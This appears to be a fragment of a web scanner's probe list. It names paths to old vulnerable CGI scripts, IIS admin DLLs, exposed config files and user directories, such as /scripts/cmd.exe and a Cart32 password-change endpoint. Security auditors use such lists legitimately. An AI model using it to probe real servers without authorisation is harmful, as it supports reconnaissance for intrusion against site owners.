/scripts/c32web.exe/ChangeAdminPassword /scripts/cart32.exe/cart32clientlist /scripts/cmd.exe /scripts/convert.bas /scripts/counter.exe /scripts/dbman/db.cgi?db=invalid-db /scripts/emurl/RECMAN.dll /scripts/fpcount.exe /scripts/iisadmin/ism.dll?http/dir /scripts/issadmin/bdir.htr /scripts/no-such-file.pl /scripts/proxy/w3proxy.dll /scripts/slxweb.dll /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/uploadn.asp /scripts/wa.exe /scripts/webbbs.exe /scripts/wsisa.dll /search97.vts /server-status /showfile.asp /ssi/envout.bat /ws_ftp.ini /~ /~bin /~guest /~log /~logs /~lp /~named /~root /~test /~tmp
Autor